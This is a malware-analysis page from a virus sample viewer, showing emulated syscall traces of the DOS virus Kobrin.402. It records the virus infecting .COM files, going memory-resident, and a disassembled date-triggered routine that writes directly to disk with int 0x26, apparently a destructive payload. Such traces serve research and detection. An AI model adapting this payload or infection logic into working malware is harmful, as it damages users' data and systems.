Sample viewer

vx.netlux.org/Virus.DOS.BrPI.Kobrin.402

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:51:52.862002509Z 42 PC: 12a48 | Get date 0x12a48: cmp dl, 0xd
0x12a4b: jne 0x12a81
0x12a4d: push bp
0x12a4e: mov cx, 0x1d
0x12a51: mov si, 0x22a
0x12a54: call 0x12b9f
0x12a57: xor al, al
0x12a59: push ax
0x12a5a: mov cx, 0x28
0x12a5d: xor bx, bx
0x12a5f: xor dx, dx
0x12a61: int 0x26
0x12a63: pop ax
0x12a64: jb 0x12a71
0x12a66: mov cx, 0x1d
0x12a69: mov dx, 0x22a
0x12a6c: inc bx
0x12a6d: mov ah, 0x40
0x12a6f: int 0x21
0x12a71: pop ax
2018-12-17T22:51:52.864296941Z 26 PC: 12a88 | Set disk transfer address
2018-12-17T22:51:52.86514319Z 37 PC: 12a90 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:51:52.865945227Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:52.867434576Z 78 PC: 12aa9 | Find first file
2018-12-17T22:51:52.871109128Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:52.88394865Z 61 PC: 12ae7 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:51:52.888191915Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:52.892153338Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:51:52.893055019Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:52.894398782Z 62 PC: 12b54 | Close file
2018-12-17T22:51:52.898773582Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:52.906351907Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:52.908970233Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:52.916799509Z 61 PC: 12ae7 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:51:52.923992286Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:52.92850603Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:51:52.929911606Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:52.931285373Z 62 PC: 12b54 | Close file
2018-12-17T22:51:52.939121061Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:52.947100993Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:52.949580653Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:52.959478293Z 61 PC: 12ae7 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:51:52.966181881Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:52.972807512Z 66 PC: 12b17 | Move file pointer
2018-12-17T22:51:52.974979951Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:52.976469768Z 62 PC: 12b54 | Close file
2018-12-17T22:51:52.985903894Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:52.995969958Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:52.998582458Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:53.008089917Z 61 PC: 12ae7 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:51:53.015278889Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:53.021636642Z 66 PC: 12bc4 | Move file pointer
2018-12-17T22:51:53.022959439Z 64 PC: 12bce | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:51:53.025741016Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:53.027872972Z 62 PC: 12b54 | Close file
2018-12-17T22:51:53.03528671Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:53.048073497Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:53.052537686Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:53.062205899Z 61 PC: 12ae7 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:51:53.06888777Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:53.075990784Z 66 PC: 12bc4 | Move file pointer
2018-12-17T22:51:53.077325695Z 64 PC: 12bce | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:51:53.07980055Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:53.081841388Z 62 PC: 12b54 | Close file
2018-12-17T22:51:53.088591765Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:53.0980544Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:53.100899673Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:53.110423064Z 61 PC: 12ae7 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:51:53.117509011Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:53.124389263Z 66 PC: 12bc4 | Move file pointer
2018-12-17T22:51:53.125684254Z 64 PC: 12bce | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:51:53.12811897Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:53.130294926Z 62 PC: 12b54 | Close file
2018-12-17T22:51:53.137204886Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:53.14662265Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:53.149834791Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:53.15930038Z 61 PC: 12ae7 | Open file (Filename = 'PAH.COM')
2018-12-17T22:51:53.165704456Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:53.17234494Z 66 PC: 12bc4 | Move file pointer
2018-12-17T22:51:53.173727054Z 64 PC: 12bce | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:51:53.177161301Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:53.178968239Z 62 PC: 12b54 | Close file
2018-12-17T22:51:53.186133826Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:53.195741654Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:53.198738765Z 67 PC: 12adf | Get or set file attributes
2018-12-17T22:51:53.208338261Z 61 PC: 12ae7 | Open file (Filename = 'TEST.COM')
2018-12-17T22:51:53.214872972Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-17T22:51:53.221739896Z 87 PC: 12b50 | Get or set file date and time
2018-12-17T22:51:53.223168Z 62 PC: 12b54 | Close file
2018-12-17T22:51:53.230188326Z 67 PC: 12b62 | Get or set file attributes
2018-12-17T22:51:53.243024052Z 79 PC: 12b69 | Find next file
2018-12-17T22:51:53.245346943Z 26 PC: 12abc | Set disk transfer address
2018-12-17T22:51:53.246376457Z 37 PC: 12ac6 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T22:51:53.247970241Z 48 PC: 15d44 | Get DOS version
2018-12-17T22:51:53.249026864Z 9 PC: 15d58 | Display string (Could not find end pointer)
2018-12-17T22:51:53.269046113Z 53 PC: 15dfe | Get interrupt vector (Interrupt = '51' AKA 'Get or set Ctrl-Break')
2018-12-17T22:51:53.271059551Z 53 PC: 15e0b | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T22:51:53.272223319Z 53 PC: 15e20 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:51:53.27445584Z 53 PC: 15e32 | Get interrupt vector (Interrupt = '16' AKA 'Close file')
2018-12-17T22:51:53.276165515Z 53 PC: 15e3f | Get interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-17T22:51:53.277234592Z 53 PC: 15e54 | Get interrupt vector (Interrupt = '8' AKA 'Console input without echo')
2018-12-17T22:51:53.282653696Z 37 PC: 1c61e | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-17T22:51:53.284576076Z 37 PC: 1c62c | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-17T22:51:53.285856168Z 37 PC: 1c63a | Set interrupt vector (Interrupt = '16' AKA 'Close file')
2018-12-17T22:51:53.287060182Z 37 PC: 12f51 | Set interrupt vector (Interrupt = '68' AKA 'I/O control for devices')
2018-12-17T22:51:53.289278898Z 37 PC: 12f76 | Set interrupt vector (Interrupt = '31' AKA 'Get disk parameter block for default drive')
2018-12-17T22:51:53.293317655Z 73 PC: 15596 | Release memory
2018-12-17T22:51:53.294934699Z 49 PC: 15599 | Terminate and stay resident (Return code = '0' | Memory size = '708')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10700,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T13:07:14.596782717Z 42 PC: 12a48 | Get date 0x12a48: cmp dl, 0xd
0x12a4b: jne 0x12a81
0x12a4d: push bp
0x12a4e: mov cx, 0x1d
0x12a51: mov si, 0x22a
0x12a54: call 0x12b9f
0x12a57: xor al, al
0x12a59: push ax
0x12a5a: mov cx, 0x28
0x12a5d: xor bx, bx
0x12a5f: xor dx, dx
0x12a61: int 0x26
0x12a63: pop ax
0x12a64: jb 0x12a71
0x12a66: mov cx, 0x1d
0x12a69: mov dx, 0x22a
0x12a6c: inc bx
0x12a6d: mov ah, 0x40
0x12a6f: int 0x21
0x12a71: pop ax
2018-12-25T13:07:14.599523582Z 26 PC: 12a88 | Set disk transfer address
2018-12-25T13:07:14.600538292Z 37 PC: 12a90 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T13:07:14.601595521Z 67 PC: 12adf | Get or set file attributes
2018-12-25T13:07:14.604066778Z 78 PC: 12aa9 | Find first file
2018-12-25T13:07:14.609712109Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.625788943Z 61 PC: 12ae7 | Open file (Filename = 'SLEEP.COM')
2018-12-25T13:07:14.632602799Z 63 PC: 12af5 | Read file or device (Read 402 bytes on handle 5)
2018-12-25T13:07:14.639146518Z 66 PC: 12b17 | Move file pointer
2018-12-25T13:07:14.640733773Z 87 PC: 12b50 | Get or set file date and time
2018-12-25T13:07:14.642765912Z 62 PC: 12b54 | Close file
2018-12-25T13:07:14.648786415Z 67 PC: 12b62 | Get or set file attributes
2018-12-25T13:07:14.660711809Z 79 PC: 12b69 | Find next file
2018-12-25T13:07:14.663760996Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.674130293Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.680441505Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.686696454Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.687980232Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.689580682Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.698044977Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.707712851Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.710327708Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.723612717Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.730811515Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.737280852Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.739552298Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.741043773Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.748100237Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.758874725Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.767585176Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.777269101Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.786297739Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.793321634Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.794641707Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.79609939Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.803514416Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.813060205Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.815574512Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.825949763Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.832333942Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.838586645Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.840693454Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.842204179Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.851933023Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.862375882Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.865242874Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.87507997Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.882304995Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.886996708Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.888599357Z 64 PC: 12b2e | Write file or device (Write 402 bytes on handle 5)
2018-12-25T13:07:14.89763255Z 66 PC: 12b39 | Move file pointer
2018-12-25T13:07:14.899340041Z 64 PC: 12b43 | Write file or device (Write 402 bytes on handle 5)
2018-12-25T13:07:14.906083133Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.909017034Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.917287578Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.927175665Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.930905624Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.942736419Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:14.949635729Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:14.956584917Z 66 PC: 12b17 | Move file pointer (See above)
2018-12-25T13:07:14.957962595Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:14.959612834Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:14.967363134Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:14.980294881Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:14.982906255Z 67 PC: 12adf | Get or set file attributes (See above)
2018-12-25T13:07:14.993259681Z 61 PC: 12ae7 | Open file (See above)
2018-12-25T13:07:15.000430838Z 63 PC: 12af5 | Read file or device (See above)
2018-12-25T13:07:15.007359403Z 87 PC: 12b50 | Get or set file date and time (See above)
2018-12-25T13:07:15.010460926Z 62 PC: 12b54 | Close file (See above)
2018-12-25T13:07:15.017727096Z 67 PC: 12b62 | Get or set file attributes (See above)
2018-12-25T13:07:15.027999794Z 79 PC: 12b69 | Find next file (See above)
2018-12-25T13:07:15.030998715Z 26 PC: 12abc | Set disk transfer address
2018-12-25T13:07:15.032132954Z 37 PC: 12ac6 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T13:07:15.033379782Z 48 PC: 15d44 | Get DOS version
2018-12-25T13:07:15.035277266Z 9 PC: 15d58 | Display string (Could not find end pointer)
2018-12-25T13:07:15.051034915Z 53 PC: 15dfe | Get interrupt vector (Interrupt = '51' AKA 'Get or set Ctrl-Break')
2018-12-25T13:07:15.052162343Z 53 PC: 15e0b | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T13:07:15.054244399Z 53 PC: 15e20 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T13:07:15.056473254Z 53 PC: 15e32 | Get interrupt vector (Interrupt = '16' AKA 'Close file')
2018-12-25T13:07:15.057596333Z 53 PC: 15e3f | Get interrupt vector (Interrupt = '22' AKA 'Create or truncate file')
2018-12-25T13:07:15.059359296Z 53 PC: 15e54 | Get interrupt vector (Interrupt = '8' AKA 'Console input without echo')
2018-12-25T13:07:15.063836187Z 37 PC: 1c61e | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T13:07:15.065195673Z 37 PC: 1c62c | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T13:07:15.067080347Z 37 PC: 1c63a | Set interrupt vector (Interrupt = '16' AKA 'Close file')
2018-12-25T13:07:15.068640503Z 37 PC: 12f51 | Set interrupt vector (Interrupt = '68' AKA 'I/O control for devices')
2018-12-25T13:07:15.070438001Z 37 PC: 12f76 | Set interrupt vector (Interrupt = '31' AKA 'Get disk parameter block for default drive')
2018-12-25T13:07:15.074645598Z 73 PC: 15596 | Release memory
2018-12-25T13:07:15.07599156Z 49 PC: 15599 | Terminate and stay resident (Return code = '0' | Memory size = '708')

{"DateBased":true,"Day":13,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":10700,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:28:54.557245128Z 42 PC: 12a48 | Get date 0x12a48: cmp dl, 0xd
0x12a4b: jne 0x12a81
0x12a4d: push bp
0x12a4e: mov cx, 0x1d
0x12a51: mov si, 0x22a
0x12a54: call 0x12b9f
0x12a57: xor al, al
0x12a59: push ax
0x12a5a: mov cx, 0x28
0x12a5d: xor bx, bx
0x12a5f: xor dx, dx
0x12a61: int 0x26
0x12a63: pop ax
0x12a64: jb 0x12a71
0x12a66: mov cx, 0x1d
0x12a69: mov dx, 0x22a
0x12a6c: inc bx
0x12a6d: mov ah, 0x40
0x12a6f: int 0x21
0x12a71: pop ax
2018-12-25T12:28:54.69004885Z 64 PC: 12a71 | Write file or device (Write 29 bytes on handle 1)